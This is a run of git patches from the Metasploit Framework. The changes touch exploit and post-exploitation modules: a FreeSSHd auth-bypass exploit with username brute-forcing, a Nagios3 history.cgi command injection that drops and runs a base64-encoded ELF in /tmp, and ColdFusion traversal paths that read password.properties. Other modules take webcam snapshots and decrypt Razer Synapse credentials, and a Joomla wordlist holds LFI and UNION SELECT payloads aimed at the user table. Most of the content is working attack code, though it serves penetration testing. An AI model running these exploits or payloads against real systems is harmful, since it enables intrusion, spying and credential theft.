+ [ true, "File containing usernames, one per line", + # Defaults to unix_users.txt, because this is the closest one we can try + File.join(Msf::Config.data_directory, "wordlists", "unix_users.txt") ] + ) ], self.class) + end def load_netssh @@ -60,9 +73,9 @@ def check connect banner = sock.recv(30) disconnect - if banner =~ /SSH-2.0-WeOnlyDo/ + if banner =~ /SSH\-2\.0\-WeOnlyDo/ version=banner.split(" ")[1] - return Exploit::CheckCode::Vulnerable if version =~ /(2.1.3|2.0.6)/ + return Exploit::CheckCode::Vulnerable if version =~ /(2\.1\.3|2\.0\.6)/ return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe @@ -85,9 +98,9 @@ def upload_payload(connection) raise ArgumentError end cmds.each { |cmd| - ret = connection.exec!("cmd.exe /c "+cmd) + connection.exec!("cmd.exe /c "+cmd) + } - end def setup_ssh_options @@ -103,7 +116,7 @@ def setup_ssh_options end def do_login(username,options) - print_status("Trying username "+username) + print_status("Trying username '#{username}'") options[:username]=username transport = Net::SSH::Transport::Session.new(datastore['RHOST'], options) @@ -114,15 +127,36 @@ def do_login(username,options) Timeout.timeout(10) do connection.exec!('cmd.exe /c echo') end - rescue RuntimeError + rescue RuntimeError return nil - rescue Timeout::Error + rescue Timeout::Error print_status("Timeout") return nil end return connection end + # + # Cannot use the auth_brute mixin, because if we do, a payload handler won't start. + # So we have to write our own each_user here. + # + def each_user(&block) + user_list = [] + if datastore['USERNAME'] and !datastore['USERNAME'].empty? + user_list << datastore['USERNAME'] + else + f = File.open(datastore['USER_FILE'], 'rb') + buf = f.read + f.close + + user_list = (user_list | buf.split).uniq + end + + user_list.each do |user| + block.call(user) + end + end + def exploit # # Load net/ssh so we can talk the SSH protocol @@ -133,21 +167,22 @@ def exploit return end - options=setup_ssh_options + options = setup_ssh_options connection = nil - usernames=datastore['USERNAMES'].split(' ') - usernames.each { |username| + each_user do |username| + next if username.empty? connection=do_login(username,options) break if connection - } + end if connection - print_status("Uploading payload. (This step can take up to 5 minutes. But if you are here, it will probably work. Have faith.)") + print_status("Uploading payload, this may take several minutes...") upload_payload(connection) handler end end + end From 2348a0b066d6ea453aa0e12104f011503ce45ba1 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 16 Jan 2013 11:55:14 +0100 Subject: [PATCH 040/421] final cleanup and testing --- .../unix/webapp/nagios3_history_cgi.rb | 72 +++++++++---------- 1 file changed, 36 insertions(+), 36 deletions(-) diff --git a/modules/exploits/unix/webapp/nagios3_history_cgi.rb b/modules/exploits/unix/webapp/nagios3_history_cgi.rb index a1e61e57c68e..39b3e8fe2868 100644 --- a/modules/exploits/unix/webapp/nagios3_history_cgi.rb +++ b/modules/exploits/unix/webapp/nagios3_history_cgi.rb @@ -9,7 +9,7 @@ require 'rex' class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking + Rank = GreatRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE @@ -22,9 +22,10 @@ def initialize(info = {}) Nagios3 history.cgi script. }, 'Author' => [ - 'Anonymous ', # Original finding - 'blasty ', # First working exploit - 'Jose Selvi ' # Metasploit module + 'Unknown ', # Original finding + 'blasty ', # First working exploit + 'Jose Selvi ', # Metasploit module + 'Daniele Martini ' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => @@ -33,8 +34,7 @@ def initialize(info = {}) [ 'OSVDB', '88322' ], [ 'BID', '56879' ], [ 'EDB', '24084' ], - [ 'URL', 'http://lists.grok.org.uk/pipermail/full-disclosure/2012-December/089125.html' ], - [ 'URL', 'http://pastebin.com/FJUNyTaj' ], + [ 'URL', 'http://lists.grok.org.uk/pipermail/full-disclosure/2012-December/089125.html' ] ], 'Platform' => ['unix', 'linux'], 'Arch' => [ ARCH_X86 ], @@ -65,10 +65,10 @@ def initialize(info = {}) ] } ], - [ 'Debian 5 (nagios3_3.0.6-4~lenny2_i386.deb)', # From original exploit. Not tested. + [ 'Debian 5 (nagios3_3.0.6-4~lenny2_i386.deb)', { - 'BannerRE' => 'Debian', - 'VersionRE' => '3.3.0', + 'BannerRE' => 'Apache/2.2.9 (Debian)', + 'VersionRE' => '3.0.6', 'Arch' => ARCH_X86, 'Offset' => 0xc37, 'RopStack' => @@ -88,7 +88,7 @@ def initialize(info = {}) register_options( [ - OptString.new('TARGETURI', [true, "The full URI path to history.cgi", "/nagios3/cgi-bin/history.cgi"]), + OptString.new('TARGETURI', [true, "The full URI path to history.cgi", "/nagios3/cgi-bin/history.cgi"]), OptString.new('USER', [false, "The username to authenticate with", "nagiosadmin"]), OptString.new('PASS', [false, "The password to authenticate with", "nagiosadmin"]), ], self.class) @@ -103,6 +103,10 @@ def detect_version(uri) }, 10) # Error handling + if res.nil? + print_error("Unable to get a response from the server") + return nil, nil + end if(res.code == 401) print_error("Please specify correct values for USER and PASS") return nil, nil @@ -111,17 +115,13 @@ def detect_version(uri) print_error("Please specify the correct path to history.cgi in the URI parameter") return nil, nil end - if res.nil? - print_error("Unable to get a response from the server") - return nil, nil - end # Extract banner from response banner = res.headers['Server'] # Extract version from body version = nil - version_line = res.body.match(/Nagios® Core™ [0-9.]+ -/) + version_line = res.body.match(/Nagios® (Core™ )?[0-9.]+ -/) if not version_line.nil? version = version_line[0].match(/[0-9.]+/)[0] end @@ -133,19 +133,16 @@ def detect_version(uri) end def select_target(version, banner) - # Get version information - if not banner.nil? - print_status("Web Server banner: #{banner}") - end - if not version.nil? - print_status("Nagios version detected: #{version}") - end # No banner and version, no target if banner.nil? or version.nil? return nil end + # Get version information + print_status("Web Server banner: #{banner}") + print_status("Nagios version detected: #{version}") + # Try regex for each target self.targets.each do |t| if t['BannerRE'].nil? or t['VersionRE'].nil? # It doesn't exist in Auto Target @@ -172,9 +169,10 @@ def check print_error("No matching target") return CheckCode::Unknown end + if alert.nil? print_error("At least one ALERT is needed in order to exploit") - return CheckCode::Safe + return CheckCode::Detected end return CheckCode::Vulnerable @@ -183,9 +181,9 @@ def check def exploit # Automatic Targeting mytarget = nil + banner, version, alert = detect_version(target_uri.path) if (target['auto']) print_status("Automatically detecting the target...") - banner, version, alert = detect_version(target_uri.path) mytarget = select_target(banner, version) if mytarget.nil? fail_with(Exploit::Failure::NoTarget, "No matching target") @@ -195,8 +193,8 @@ def exploit end print_status("Selected Target: #{mytarget.name}") - if alert and alert.nil? - fail_with(Exploit::Failure::NoTarget, "At least one ALERT is needed in order to exploit") + if alert.nil? + print_error("At least one ALERT is needed in order to exploit, none found in the first page, trying anyway...") end print_status("Sending request to http://#{rhost}:#{rport}#{target_uri.path}") @@ -208,7 +206,11 @@ def exploit tempfile = '/tmp/' + rand_text_alphanumeric(10) # Generate command-line execution - cmd = 'echo ' + elfb64 + '|base64 -d|tee ' + tempfile + ';chmod 700 ' + tempfile + ';rm -rf ' + tempfile + '|' + tempfile + ';' + if mytarget.name =~ /CentOS/ + cmd = "echo #{elfb64}|base64 -d|tee #{tempfile};chmod 700 #{tempfile};rm -rf #{tempfile}|#{tempfile};" + else + cmd = "echo #{elfb64}|base64 -d|tee #{tempfile} |chmod +x #{tempfile};#{tempfile};rm -f #{tempfile}" + end host_value = cmd.gsub!(' ', '${IFS}') # Generate 'host' parameter value @@ -227,9 +229,9 @@ def exploit { 'host' => host_value } - }, 10) + }) - if(not res) + if not res if session_created? print_status("Session created, enjoy!") else @@ -238,17 +240,15 @@ def exploit return end - if(res.code == 401) - print_error("Please specify correct values for USER and PASS") - return + if res.code == 401 + fail_with(Exploit::Failure::NoAccess, "Please specify correct values for USER and PASS") end - if(res.code == 404) - print_error("Please specify the correct path to history.cgi in the URI parameter") - return + if res.code == 404 + fail_with(Exploit::Failure::NotFound, "Please specify the correct path to history.cgi in the TARGETURI parameter") end - print_status("Unknown response") + print_status("Unknown response #{res.code}") end end From 51ba500b9f7cddb9c633b1820ed91566c829119e Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 16 Jan 2013 12:28:09 +0100 Subject: [PATCH 041/421] msftidy compliant --- modules/exploits/windows/ssh/freesshd_authbypass.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/exploits/windows/ssh/freesshd_authbypass.rb b/modules/exploits/windows/ssh/freesshd_authbypass.rb index 4e667138fe53..8d057a4a7f5c 100644 --- a/modules/exploits/windows/ssh/freesshd_authbypass.rb +++ b/modules/exploits/windows/ssh/freesshd_authbypass.rb @@ -99,7 +99,6 @@ def upload_payload(connection) end cmds.each { |cmd| connection.exec!("cmd.exe /c "+cmd) - } end From 481f2eb791365eefe3d65334b7e44740dde4e61d Mon Sep 17 00:00:00 2001 From: lmercer Date: Wed, 16 Jan 2013 17:23:35 -0500 Subject: [PATCH 042/421] updated cold_fusion_version from Redmine Feature #6822 --- modules/auxiliary/scanner/http/cold_fusion_version.rb | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/http/cold_fusion_version.rb b/modules/auxiliary/scanner/http/cold_fusion_version.rb index 92aaba751ef8..1f7169e41587 100644 --- a/modules/auxiliary/scanner/http/cold_fusion_version.rb +++ b/modules/auxiliary/scanner/http/cold_fusion_version.rb @@ -36,10 +36,10 @@ def fingerprint(response) end end - len = (response.body.length > 2500) ? 2500 : response.body.length return nil if response.body.length < 100 title = "Not Found" + response.body.gsub!(/[\r\n]/, '') if(response.body =~ /(.+)<\/title\/?>/i) title = $1 title.gsub!(/\s/, '') @@ -51,6 +51,8 @@ def fingerprint(response) if(response.body =~ />\s*Version:\s*(.*)<\/strong\> url, 'method' => 'GET', - }, 5) + }, 10) return if not res or not res.body or not res.code res.body.gsub!(/[\r|\n]/, ' ') From 4fd4af1f43cc7bed1261a23bff5fef377767cb7f Mon Sep 17 00:00:00 2001 From: James Lee Date: Wed, 16 Jan 2013 16:30:38 -0600 Subject: [PATCH 043/421] Fix typo that breaks record_mic command --- .../meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb index e2d05bfa2a0d..a550f9b529b6 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb @@ -29,7 +29,7 @@ def commands reqs = { "webcam_list" => [ "webcam_list" ], "webcam_snap" => [ "webcam_start", "webcam_get_frame", "webcam_stop" ], - "record_mic" => [ "webcam_record_audio" ], + "record_mic" => [ "webcam_audio_record" ], } all.delete_if do |cmd, desc| From ddd2dbc17bb69744409194724951c1a2a03c2167 Mon Sep 17 00:00:00 2001 From: lmercer Date: Wed, 16 Jan 2013 17:54:15 -0500 Subject: [PATCH 044/421] Updated coldfusion_local_traversal as described in Redmine Feature #6822 --- .../http/coldfusion_locale_traversal.rb | 213 ++++++++++++++++-- 1 file changed, 189 insertions(+), 24 deletions(-) diff --git a/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb b/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb index f02623f760d1..3a360e80e193 100644 --- a/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb +++ b/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb @@ -29,8 +29,12 @@ def initialize to have directory traversal protections in place, subsequently this module does NOT work against ColdFusion 9. Adobe did not release patches for ColdFusion 6.1 or ColdFusion 7. + + It is not recommended to set FILE when doing scans across a group of servers where the OS + may vary; otherwise, the file requested may not make sense for the OS + }, - 'Author' => [ 'CG' ], + 'Author' => [ 'CG', 'nebulus' ], 'License' => MSF_LICENSE, 'References' => [ @@ -45,40 +49,201 @@ def initialize register_options( [ - OptString.new('URL', [ true, "URI Path", '/CFIDE/administrator/enter.cfm']), - OptString.new('PATH', [ true, "traversal and file", '../../../../../../../../../../ColdFusion8/lib/password.properties%00en']), + OptString.new('FILE', [ false, 'File to retrieve (make sure path/file match OS (ie, /etc/passwd on Windows == dumb))', '']), + OptBool.new('FINGERPRINT', [true, 'Only fingerprint endpoints', false]), ], self.class) end + def fingerprint(response) + + if(response.headers.has_key?('Server') ) + if(response.headers['Server'] =~ /IIS/ or response.headers['Server'] =~ /\(Windows/) + os = "Windows (#{response.headers['Server']})" + elsif(response.headers['Server'] =~ /Apache\//) + os = "Unix (#{response.headers['Server']})" + else + os = response.headers['Server'] + end + end + + return nil if response.body.length < 100 + + title = "Not Found" + response.body.gsub!(/[\r\n]/, '') + if(response.body =~ /(.+)<\/title\/?>/i) + title = $1 + title.gsub!(/\s/, '') + end + return nil if( title == 'Not Found' or not title =~ /ColdFusionAdministrator/) + + out = nil + + if(response.body =~ />\s*Version:\s*(.*)<\/strong\>\s+(.+)<\/title\/?>/i) + title = $1 + title.gsub!(/\s/, '') + end + return nil if( title == 'Not Found' or not title =~ /ColdFusionAdministrator/) + + out = nil - res = send_request_raw({ - 'uri' => url+locale+trav, - 'method' => 'GET', - 'headers' => - { + if(response.body =~ />\s*Version:\s*(.*)<\/strong\>\s+ url, + 'method' => 'GET', 'Connection' => "keep-alive", 'Accept-Encoding' => "zip,deflate", - }, - }, -1) - - if (res.nil?) - print_error("no response for #{ip}:#{rport} #{url}") - elsif (res.code == 200) - #print_error("#{res.body}")#debug - print_status("URL: #{ip}#{url}") - if match = res.body.match(/\(.*)\<\/title\>/im); - fileout = $1 - print_status("FILE OUTPUT:\n" + fileout + "\r\n") + }, 10) + return if not res or not res.body or not res.code + + if (res.code.to_i == 200) + out = fingerprint(res) + print_status("#{ip} #{out}") if out + return if (datastore['FINGERPRINT']) + + if(out =~ /Windows/ and out =~ /MX6/) + trav = '..\..\..\..\..\..\..\..\..\..\CFusionMX\lib\password.properties%00en' + elsif(out =~ /Windows/ and out =~ /MX7/) + trav = '..\..\..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties%00en' + elsif(out =~ /Windows/ and out =~ /ColdFusion 8/) + trav = '..\..\..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en' + elsif(out =~ /ColdFusion 9/) + print_status("#{ip} ColdFusion 9 is not vulnerable, skipping") + return + elsif(out =~ /Unix/ and out =~ /MX6/) + trav = '../../../../../../../../../../opt/coldfusionmx/lib/password.properties%00en' + elsif(out =~ /Unix/ and out =~ /MX7/) + trav = '../../../../../../../../../../opt/coldfusionmx7/lib/password.properties%00en' + elsif(out =~ /Unix/ and out =~ /ColdFusion 8/) + trav = '../../../../../../../../../../opt/coldfusion8/lib/password.properties%00en' + else + if(res.body =~ /Adobe/ and res.body =~ /ColdFusion/) + print_error("#{ip} Fingerprint failed, FILE not set...aborting") + else + return # probably just a web server + end + end else - '' + return # silent fail as it doesnt necessarily at this point have to be a CF server end + end + + # file specified or obtained via fingerprint + if(trav !~ /\.\.\/\.\.\// and trav !~ /\.\.\\\.\.\\/) + # file probably specified by user, make sure to add in actual traversal + trav = '../../../../../../../../../../' << trav << '%00en' + end + + locale = "?locale=" + + urls = ["/CFIDE/administrator/enter.cfm", "/CFIDE/wizards/common/_logintowizard.cfm", "/CFIDE/administrator/archives/index.cfm", + "/CFIDE/administrator/entman/index.cfm", "/CFIDE/administrator/logging/settings.cfm"] + # "/CFIDE/install.cfm", haven't seen where this one works + + out = '' # to keep output in synch with threads + urls.each do |url| + res = send_request_raw({ + 'uri' => url+locale+trav, + 'method' => 'GET', + 'headers' => + { + 'Connection' => "keep-alive", + 'Accept-Encoding' => "zip,deflate", + }, + }, -1) + + + if (res.nil?) + print_error("no response for #{ip}:#{rport} #{url}") + elsif (res.code == 200) + #print_error("#{res.body}")#debug + out << "URL: #{ip}#{url}#{locale}#{trav}\n" + if match = res.body.match(/\(.*)\<\/title\>/im) + fileout = $1 + if(fileout !~ /Login$/ and fileout !~ /^Welcome to ColdFusion/ and fileout !~ /^Archives and Deployment/) + out << "#{ip} FILE:\n#{fileout}\r\n" + break + end + end + else + next if (res.code == 500 or res.code == 404 or res.code == 302) + print_error("#{ip} #{res.inspect}") + end + end + if(out =~ /FILE/) + print_good(out) else - '' + print_status(out) end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError From a701b5eb79bb4ec0808a047e16946c38734e9928 Mon Sep 17 00:00:00 2001 From: lmercer Date: Wed, 16 Jan 2013 18:21:19 -0500 Subject: [PATCH 045/421] fixed an error that occurred when patching. --- .../http/coldfusion_locale_traversal.rb | 50 +------------------ 1 file changed, 1 insertion(+), 49 deletions(-) diff --git a/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb b/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb index 3a360e80e193..06874e30c7ee 100644 --- a/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb +++ b/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb @@ -103,55 +103,7 @@ def fingerprint(response) end def run_host(ip) - trav = datas+ def fingerprint(response) - - if(response.headers.has_key?('Server') ) - if(response.headers['Server'] =~ /IIS/ or response.headers['Server'] =~ /\(Windows/) - os = "Windows (#{response.headers['Server']})" - elsif(response.headers['Server'] =~ /Apache\//) - os = "Unix (#{response.headers['Server']})" - else - os = response.headers['Server'] - end - end - - return nil if response.body.length < 100 - - title = "Not Found" - response.body.gsub!(/[\r\n]/, '') - if(response.body =~ /(.+)<\/title\/?>/i) - title = $1 - title.gsub!(/\s/, '') - end - return nil if( title == 'Not Found' or not title =~ /ColdFusionAdministrator/) - - out = nil - - if(response.body =~ />\s*Version:\s*(.*)<\/strong\>\s+ Date: Thu, 17 Jan 2013 00:18:13 -0600 Subject: [PATCH 046/421] adds check for empty data b4 sending to parser [RM7269] [fixes RM7269] we discussed the solution to this bug a lot on IRC and in the ticket itself, the consensus was to fix it as far upstream as possible before sending to the parsers so as to avoid any future bugs of the same nature, so this commit adds a check to import_nmap_xml to see if the data is empty before passing it on to the parser, whether that parser is nokogiri or the legacy parser. db_nmap -h now produces the expected output and db_nmap still works as expected. --- lib/msf/core/db.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/lib/msf/core/db.rb b/lib/msf/core/db.rb index 95abe10e2a12..926627ef4fe3 100644 --- a/lib/msf/core/db.rb +++ b/lib/msf/core/db.rb @@ -4869,6 +4869,7 @@ def import_nmap_noko_stream(args, &block) # If you have Nokogiri installed, you'll be shunted over to # that. Otherwise, you'll hit the old NmapXMLStreamParser. def import_nmap_xml(args={}, &block) + return nil if args[:data].empty? wspace = args[:wspace] || workspace bl = validate_ips(args[:blacklist]) ? args[:blacklist].split : [] From 6e8e7a407d34ad7b2b19e26b0f7296e9232a207c Mon Sep 17 00:00:00 2001 From: kernelsmith Date: Thu, 17 Jan 2013 00:30:58 -0600 Subject: [PATCH 047/421] adds a .nil? check as well --- lib/msf/core/db.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/db.rb b/lib/msf/core/db.rb index 926627ef4fe3..a8cfe5543112 100644 --- a/lib/msf/core/db.rb +++ b/lib/msf/core/db.rb @@ -4869,7 +4869,7 @@ def import_nmap_noko_stream(args, &block) # If you have Nokogiri installed, you'll be shunted over to # that. Otherwise, you'll hit the old NmapXMLStreamParser. def import_nmap_xml(args={}, &block) - return nil if args[:data].empty? + return nil if args[:data].nil? or args[:data].empty? wspace = args[:wspace] || workspace bl = validate_ips(args[:blacklist]) ? args[:blacklist].split : [] From 40ba0756557f8ae96416c0f498d8a11252f452f0 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Thu, 17 Jan 2013 02:41:16 -0600 Subject: [PATCH 048/421] Implements the webcam feature as a post mod As a post mod, we can deploy the webcam feature more easily against multiple sessions in the web gui. --- modules/post/windows/manage/webcam.rb | 135 ++++++++++++++++++++++++++ 1 file changed, 135 insertions(+) create mode 100644 modules/post/windows/manage/webcam.rb diff --git a/modules/post/windows/manage/webcam.rb b/modules/post/windows/manage/webcam.rb new file mode 100644 index 000000000000..6b838d04aacd --- /dev/null +++ b/modules/post/windows/manage/webcam.rb @@ -0,0 +1,135 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'rex' + +class Metasploit3 < Msf::Post + + include Msf::Auxiliary::Report + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Windows Manage Webcam', + 'Description' => %q{ + This module will allow you to these things with your target's webcam: detect, + take a snapshot. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'sinn3r'], + 'Platform' => [ 'win'], + 'SessionTypes' => [ "meterpreter" ], + 'Actions' => + [ + [ 'LIST', { 'Description' => 'Show a list of webcams' } ], + [ 'SNAPSHOT', { 'Description' => 'Take a snapshot with the webcam' } ] + ], + 'DefaultAction' => 'LIST' + )) + + register_options( + [ + OptInt.new('INDEX', [false, 'The index of the webcam to use', 1]), + OptInt.new('QUALITY', [false, 'The JPEG image quality', 50]) + ], self.class) + end + + + def run + if client.nil? + print_error("Invalid session ID selected. Make sure the host isn't dead.") + return + end + + if not action + print_error("Invalid action") + return + end + + case action.name + when /^list$/i + list_webcams(true) + when /^snapshot$/i + snapshot + end + end + + + def rhost + client.sock.peerhost + end + + + def snapshot + webcams = list_webcams + + if webcams.empty? + print_error("#{rhost} - No webcams found") + return + end + + if not webcams[datastore['INDEX']-1] + print_error("#{rhost} - No such index: #{datastore['INDEX'].to_s}") + return + end + + buf = nil + + begin + print_status("#{rhost} - Starting...") + client.webcam.webcam_start(datastore['INDEX']) + + buf = client.webcam.webcam_get_frame(datastore['QUALITY']) + if buf + print_status("#{rhost} - Got frame") + + p = store_loot( + "#{rhost}.webcam.snapshot", + 'application/octet-stream', + rhost, + buf, + "#{rhost}_snapshot.jpg", + "#{rhost} Webcam Snapshot" + ) + + print_good("#{rhost} - Snapshot saved: #{p}") + end + + client.webcam.webcam_stop + print_status("#{rhost} - Stopped") + rescue Rex::Post::Meterpreter::RequestError => e + print_error(e.message) + return + end + end + + + def list_webcams(show=false) + begin + webcams = client.webcam.webcam_list + rescue Rex::Post::Meterpreter::RequestError + webcams = [] + end + + if show + tbl = Rex::Ui::Text::Table.new( + 'Header' => 'Webcam List', + 'Indent' => 1, + 'Columns' => ['Index', 'Name'] + ) + + webcams.each_with_index do |name, indx| + tbl << [(indx+1).to_s, name] + end + + print_line(tbl.to_s) + end + + return webcams + end + +end \ No newline at end of file From 09b4a09ce1dfc7a0e63d72d338835d41c21fe95f Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 17 Jan 2013 16:53:00 +0100 Subject: [PATCH 049/421] module razer_synapse cleanup --- .../gather/credentials/razer_synapse.rb | 20 ++++++++++--------- 1 file changed, 11 insertions(+), 9 deletions(-) diff --git a/modules/post/windows/gather/credentials/razer_synapse.rb b/modules/post/windows/gather/credentials/razer_synapse.rb index 96f94572968e..b0b569ade040 100644 --- a/modules/post/windows/gather/credentials/razer_synapse.rb +++ b/modules/post/windows/gather/credentials/razer_synapse.rb @@ -15,6 +15,7 @@ class Metasploit3 < Msf::Post include Msf::Post::Common include Msf::Post::Windows::UserProfiles + include Msf::Post::File def initialize(info={}) super(update_info(info, @@ -23,7 +24,7 @@ def initialize(info={}) This module will enumerate passwords stored by the Razer Synapse client. The encryption key and iv is publicly known. This module will not only extract encrypted password but will also decrypt - password using public key. Affects version 1.7.15 and earlier. + password using public key. Affects versions earlier than 1.7.15. }, 'License' => MSF_LICENSE, 'Author' => @@ -32,9 +33,13 @@ def initialize(info={}) 'Matt Howard "pasv" ', #PoC 'Brandon McCann "zeknox" ' ], + 'References' => + [ + [ 'URL', 'http://www.pentestgeek.com/2013/01/16/hard-coded-encryption-keys-and-more-wordpress-fun/' ], + [ 'URL', 'https://github.com/pasv/Testing/blob/master/Razer_decode.py' ] + ], 'SessionTypes' => [ 'meterpreter' ], - 'Platform' => [ 'win' ], - + 'Platform' => [ 'win' ] )) end @@ -61,7 +66,7 @@ def decrypt(hash) def store_creds(user, pass) if db report_auth_info( - :host => client.sock.peerhost, + :host => Rex::Socket.resolv_to_dotted("www.razerzone.com"), :port => 443, :ptype => 'password', :sname => 'razer_synapse', @@ -98,13 +103,10 @@ def run grab_user_profiles().each do |user| if user['LocalAppData'] accounts = user['LocalAppData'] + "\\Razer\\Synapse\\Accounts\\RazerLoginData.xml" - # open the file for reading - config = client.fs.file.new(accounts, 'r') rescue nil - next if config.nil? + next if not file?(accounts) print_status("Config found for user #{user['UserName']}") - contents = config.read - config.close + contents = read_file(accounts) # read the contents of file creds = parse_config(contents) From 0b61d28e0ee433e9a9daf9f411b61993e30c5baa Mon Sep 17 00:00:00 2001 From: f8lerror Date: Thu, 17 Jan 2013 11:36:59 -0500 Subject: [PATCH 050/421] added Joomla scanner and url wordlist --- data/wordlists/pcheck.txt | 627 ++++++++++++++++++ .../auxiliary/scanner/http/joomla_vulnscan.rb | 270 ++++++++ 2 files changed, 897 insertions(+) create mode 100755 data/wordlists/pcheck.txt create mode 100755 modules/auxiliary/scanner/http/joomla_vulnscan.rb diff --git a/data/wordlists/pcheck.txt b/data/wordlists/pcheck.txt new file mode 100755 index 000000000000..b65dd2a422e2 --- /dev/null +++ b/data/wordlists/pcheck.txt @@ -0,0 +1,627 @@ +&controller=../../../../../../../../../../../../[LFI]%00 +?1.5.10-x +?1.5.11-x-http_ref +?1.5.11-x-php-s3lf +?1.5.3-path-disclose +?1.5.3-spam +?1.5.8-x +?1.5.9-x +?j1012-fixate-session +?option=com_mysms&Itemid=0&task=phonebook +Joomla_1.6.0-Alpha2-Full-Package/components/com_mailto/assets/close-x.png +admin/ +administrator/ +administrator/components/ +administrator/components/com_a6mambocredits/ +administrator/components/com_a6mambohelpdesk/ +administrator/components/com_admin/admin.admin.html.php +administrator/components/com_astatspro/refer.php +administrator/components/com_bayesiannaivefilter/ +administrator/components/com_chronocontact/excelwriter/PPS/File.php +administrator/components/com_colophon/ +administrator/components/com_colorlab/ +administrator/components/com_comprofiler/ +administrator/components/com_comprofiler/plugin.class.php +administrator/components/com_cropimage/admin.cropcanvas.php +administrator/components/com_extplorer/ +administrator/components/com_feederator/includes/tmsp/add_tmsp.php +administrator/components/com_googlebase/ +administrator/components/com_installer +administrator/components/com_jcs/ +administrator/components/com_jim/ +administrator/components/com_jjgallery/ +administrator/components/com_joom12pic/ +administrator/components/com_joomla-visites/ +administrator/components/com_joomla_flash_uploader/ +administrator/components/com_joomlaflashfun/ +administrator/components/com_joomlaradiov5/ +administrator/components/com_jpack/ +administrator/components/com_jreactions/ +administrator/components/com_juser/ +administrator/components/com_admin/ +administrator/components/com_kochsuite / +administrator/components/com_linkdirectory/ +administrator/components/com_livechat/getSavedChatRooms.php +administrator/components/com_livechat/xmlhttp.php +administrator/components/com_lurm_constructor/admin.lurm_constructor.php +administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php?name=lo.php"); +administrator/components/com_mambelfish/ +administrator/components/com_mgm/ +administrator/components/com_mmp/help.mmp.php +administrator/components/com_mosmedia/ +administrator/components/com_multibanners/extadminmenus.class.php +administrator/components/com_panoramic/ +administrator/components/com_peoplebook/param.peoplebook.php +administrator/components/com_phpshop/toolbar.phpshop.html.php +administrator/components/com_remository/admin.remository.php +administrator/components/com_serverstat/install.serverstat.php +administrator/components/com_simpleswfupload/uploadhandler.php"); +administrator/components/com_swmenupro/ +administrator/components/com_treeg/ +administrator/components/com_uhp/ +administrator/components/com_uhp2/ +administrator/components/com_webring/ +administrator/components/com_wmtgallery/ +administrator/components/com_wmtportfolio/ +administrator/components/com_x-shop/ +administrator/index.php?option=com_djartgallery&task=editItem&cid[]=1'+and+1=1+--+ +administrator/index.php?option=com_searchlog&act=log +ajaxim/ +akocomments.php +cart?Itemid=[SQLi] +component/com__brightweblinks/ +component/option,com_jdirectory/task,show_content/contentid,1067/catid,26/directory,1/Itemid,0 +component/osproperty/?task=agent_register +component/quran/index.php?option=com_quran&action=viewayat&surano= +components/com_ clickheat/ +components/com_5starhotels/ +components/com_Jambook/jambook.php +components/com_a6mambocredits/ +components/com_a6mambohelpdesk/ +components/com_ab_gallery/ +components/com_acajoom/ +components/com_acctexp/ +components/com_aclassf/ +components/com_activities/ +components/com_actualite/ +components/com_admin/admin.admin.html.php +components/com_advancedpoll/ +components/com_agora/ +components/com_agoragroup/ +components/com_ajaxchat/ +components/com_akobook/ +components/com_akocomment/ +components/com_akogallery +components/com_alberghi/ +components/com_allhotels/ +components/com_alphacontent/ +components/com_altas/ +components/com_amocourse/ +components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php +components/com_articles/ +components/com_artist/ +components/com_artlinks/ +components/com_asortyment/ +components/com_astatspro/ +components/com_awesom/ +components/com_babackup/ +components/com_banners/ +components/com_bayesiannaivefilter/ +components/com_be_it_easypartner/ +components/com_beamospetition/ +components/com_biblestudy/ +components/com_biblioteca/views/biblioteca/tmpl/pdf.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23 +components/com_biblioteca/views/biblioteca/tmpl/stampa.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23 +components/com_blog/ +components/com_bookflip/ +components/com_bookjoomlas/ +components/com_booklibrary/ +components/com_books/ +components/com_bsadv/ +components/com_bsq_sitestats/ +components/com_bsq_sitestats/external/rssfeed.php +components/com_bsqsitestats/ +components/com_calendar/ +components/com_camelcitydb2/ +components/com_candle/ +components/com_casino_blackjack/ +components/com_casino_videopoker/ +components/com_casinobase/ +components/com_catalogproduction/ +components/com_catalogshop/ +components/com_category/ +components/com_cgtestimonial/video.php?url="> 